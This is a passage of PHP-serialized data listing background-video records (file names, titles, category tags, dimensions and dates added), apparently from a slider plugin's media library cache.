11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:327;a:13:{s:2:\"id\";s:3:\"511\";s:6:\"handle\";s:26:\"Typing-on-the-keyboard.jpg\";s:5:\"video\";s:26:\"Typing-on-the-keyboard.mp4\";s:4:\"name\";s:23:\"Typing on the keyboard \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:328;a:13:{s:2:\"id\";s:3:\"510\";s:6:\"handle\";s:11:\"Meeting.jpg\";s:5:\"video\";s:11:\"Meeting.mp4\";s:4:\"name\";s:8:\"Meeting \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:329;a:13:{s:2:\"id\";s:3:\"509\";s:6:\"handle\";s:11:\"Swiping.jpg\";s:5:\"video\";s:11:\"Swiping.mp4\";s:4:\"name\";s:8:\"Swiping \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:330;a:13:{s:2:\"id\";s:3:\"508\";s:6:\"handle\";s:9:\"Alarm.jpg\";s:5:\"video\";s:9:\"Alarm.mp4\";s:4:\"name\";s:6:\"Alarm \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1013\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:331;a:13:{s:2:\"id\";s:3:\"507\";s:6:\"handle\";s:13:\"Hey-World.jpg\";s:5:\"video\";s:13:\"Hey-World.mp4\";s:4:\"name\";s:10:\"Hey World \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:332;a:13:{s:2:\"id\";s:3:\"506\";s:6:\"handle\";s:28:\"Typing-on-the-keyboard-2.jpg\";s:5:\"video\";s:28:\"Typing-on-the-keyboard-2.mp4\";s:4:\"name\";s:25:\"Typing on the keyboard 2 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:333;a:13:{s:2:\"id\";s:3:\"505\";s:6:\"handle\";s:10:\"Valley.jpg\";s:5:\"video\";s:10:\"Valley.mp4\";s:4:\"name\";s:7:\"Valley \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:35:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:334;a:13:{s:2:\"id\";s:3:\"504\";s:6:\"handle\";s:9:\"Stars.jpg\";s:5:\"video\";s:9:\"Stars.mp4\";s:4:\"name\";s:6:\"Stars \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:35:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:335;a:13:{s:2:\"id\";s:3:\"503\";s:6:\"handle\";s:21:\"Car-in-the-forest.jpg\";s:5:\"video\";s:21:\"Car-in-the-forest.mp4\";s:4:\"name\";s:18:\"Car in the forest \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1012\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:35:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:336;a:13:{s:2:\"id\";s:3:\"502\";s:6:\"handle\";s:15:\"Aerial-Shot.jpg\";s:5:\"video\";s:15:\"Aerial-Shot.mp4\";s:4:\"name\";s:12:\"Aerial Shot \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:35:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:337;a:13:{s:2:\"id\";s:3:\"501\";s:6:\"handle\";s:14:\"Disco-Ball.jpg\";s:5:\"video\";s:14:\"Disco-Ball.mp4\";s:4:\"name\";s:11:\"Disco Ball \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:33:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:338;a:13:{s:2:\"id\";s:3:\"500\";s:6:\"handle\";s:22:\"Man-Playing-Guitar.jpg\";s:5:\"video\";s:22:\"Man-Playing-Guitar.mp4\";s:4:\"name\";s:19:\"Man Playing Guitar \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:33:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:339;a:13:{s:2:\"id\";s:3:\"499\";s:6:\"handle\";s:14:\"Live-Music.jpg\";s:5:\"video\";s:14:\"Live-Music.mp4\";s:4:\"name\";s:11:\"Live Music \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:33:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:340;a:13:{s:2:\"id\";s:3:\"498\";s:6:\"handle\";s:12:\"Cheer-Up.jpg\";s:5:\"video\";s:12:\"Cheer-Up.mp4\";s:4:\"name\";s:9:\"Cheer Up \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:33:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:341;a:13:{s:2:\"id\";s:3:\"497\";s:6:\"handle\";s:14:\"Night-club.jpg\";s:5:\"video\";s:14:\"Night-club.mp4\";s:4:\"name\";s:11:\"Night club \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:33:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:342;a:13:{s:2:\"id\";s:3:\"496\";s:6:\"handle\";s:17:\"Cup-Of-Coffee.jpg\";s:5:\"video\";s:17:\"Cup-Of-Coffee.mp4\";s:4:\"name\";s:14:\"Cup Of Coffee \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:30:48\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:343;a:13:{s:2:\"id\";s:3:\"495\";s:6:\"handle\";s:7:\"Pot.jpg\";s:5:\"video\";s:7:\"Pot.mp4\";s:4:\"name\";s:4:\"Pot \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:30:48\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:344;a:13:{s:2:\"id\";s:3:\"494\";s:6:\"handle\";s:11:\"Grill-2.jpg\";s:5:\"video\";s:11:\"Grill-2.mp4\";s:4:\"name\";s:8:\"Grill 2 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:30:48\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:345;a:13:{s:2:\"id\";s:3:\"493\";s:6:\"handle\";s:13:\"Rice-Bowl.jpg\";s:5:\"video\";s:13:\"Rice-Bowl.mp4\";s:4:\"name\";s:10:\"Rice Bowl \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1010\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:30:48\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:346;a:13:{s:2:\"id\";s:3:\"492\";s:6:\"handle\";s:9:\"Grill.jpg\";s:5:\"video\";s:9:\"Grill.mp4\";s:4:\"name\";s:6:\"Grill \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:30:48\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:347;a:13:{s:2:\"id\";s:3:\"491\";s:6:\"handle\";s:9:\"Water.jpg\";s:5:\"video\";s:9:\"Water.mp4\";s:4:\"name\";s:6:\"Water \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:24:15\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:348;a:13:{s:2:\"id\";s:3:\"490\";s:6:\"handle\";s:17:\"Feet-and-Sand.jpg\";s:5:\"video\";s:17:\"Feet-and-Sand.mp4\";s:4:\"name\";s:14:\"Feet and Sand \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:24:15\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:349;a:13:{s:2:\"id\";s:3:\"489\";s:6:\"handle\";s:9:\"Ocean.jpg\";s:5:\"video\";s:9:\"Ocean.mp4\";s:4:\"name\";s:6:\"Ocean \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:24:15\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:350;a:13:{s:2:\"id\";s:3:\"488\";s:6:\"handle\";s:9:\"Waves.jpg\";s:5:\"video\";s:9:\"Waves.mp4\";s:4:\"name\";s:6:\"Waves \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:24:15\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:351;a:13:{s:2:\"id\";s:3:\"487\";s:6:\"handle\";s:10:\"Hearts.jpg\";s:5:\"video\";s:10:\"Hearts.mp4\";s:4:\"name\";s:7:\"Hearts \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:352;a:13:{s:2:\"id\";s:3:\"486\";s:6:\"handle\";s:12:\"Octagons.jpg\";s:5:\"video\";s:12:\"Octagons.mp4\";s:4:\"name\";s:9:\"Octagons \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:353;a:13:{s:2:\"id\";s:3:\"485\";s:6:\"handle\";s:11:\"Squares.jpg\";s:5:\"video\";s:11:\"Squares.mp4\";s:4:\"name\";s:8:\"Squares \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:354;a:13:{s:2:\"id\";s:3:\"484\";s:6:\"handle\";s:12:\"Pink-ink.jpg\";s:5:\"video\";s:12:\"Pink-ink.mp4\";s:4:\"name\";s:9:\"Pink ink \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:355;a:13:{s:2:\"id\";s:3:\"483\";s:6:\"handle\";s:22:\"Blurred-Background.jpg\";s:5:\"video\";s:22:\"Blurred-Background.mp4\";s:4:\"name\";s:19:\"Blurred Background \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:356;a:13:{s:2:\"id\";s:3:\"482\";s:6:\"handle\";s:20:\"Blinking-bubbles.jpg\";s:5:\"video\";s:20:\"Blinking-bubbles.mp4\";s:4:\"name\";s:17:\"Blinking bubbles \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:357;a:13:{s:2:\"id\";s:3:\"481\";s:6:\"handle\";s:13:\"Fireworks.jpg\";s:5:\"video\";s:13:\"Fireworks.mp4\";s:4:\"name\";s:10:\"Fireworks \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:358;a:13:{s:2:\"id\";s:3:\"480\";s:6:\"handle\";s:12:\"Dark-ink.jpg\";s:5:\"video\";s:12:\"Dark-ink.mp4\";s:4:\"name\";s:9:\"Dark ink \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:359;a:13:{s:2:\"id\";s:3:\"238\";s:6:\"handle\";s:12:\"Mt_Baker.jpg\";s:5:\"video\";s:12:\"Mt_Baker.mp4\";s:4:\"name\";s:9:\"Mt Baker \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:360;a:13:{s:2:\"id\";s:3:\"237\";s:6:\"handle\";s:16:\"Two-Swimmers.jpg\";s:5:\"video\";s:16:\"Two-Swimmers.mp4\";s:4:\"name\";s:13:\"Two Swimmers \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:361;a:13:{s:2:\"id\";s:3:\"236\";s:6:\"handle\";s:14:\"Boats_Maze.jpg\";s:5:\"video\";s:14:\"Boats_Maze.mp4\";s:4:\"name\";s:11:\"Boats Maze \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:362;a:13:{s:2:\"id\";s:3:\"235\";s:6:\"handle\";s:18:\"Candolim-Beach.jpg\";s:5:\"video\";s:18:\"Candolim-Beach.mp4\";s:4:\"name\";s:15:\"Candolim Beach \";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:363;a:13:{s:2:\"id\";s:3:\"234\";s:6:\"handle\";s:17:\"Working-Space.jpg\";s:5:\"video\";s:17:\"Working-Space.mp4\";s:4:\"name\";s:14:\"Working Space \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:364;a:13:{s:2:\"id\";s:3:\"233\";s:6:\"handle\";s:9:\"Wavez.jpg\";s:5:\"video\";s:9:\"Wavez.mp4\";s:4:\"name\";s:6:\"Wavez \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:365;a:13:{s:2:\"id\";s:3:\"232\";s:6:\"handle\";s:17:\"Coconut-Grove.jpg\";s:5:\"video\";s:17:\"Coconut-Grove.mp4\";s:4:\"name\";s:14:\"Coconut Grove \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:366;a:13:{s:2:\"id\";s:3:\"231\";s:6:\"handle\";s:19:\"Very-Open-Space.jpg\";s:5:\"video\";s:19:\"Very-Open-Space.mp4\";s:4:\"name\";s:16:\"Very Open Space \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:367;a:13:{s:2:\"id\";s:3:\"230\";s:6:\"handle\";s:14:\"Office-Day.jpg\";s:5:\"video\";s:14:\"Office-Day.mp4\";s:4:\"name\";s:11:\"Office Day \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:368;a:13:{s:2:\"id\";s:3:\"229\";s:6:\"handle\";s:12:\"The-Hill.jpg\";s:5:\"video\";s:12:\"The-Hill.mp4\";s:4:\"name\";s:9:\"The Hill \";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New 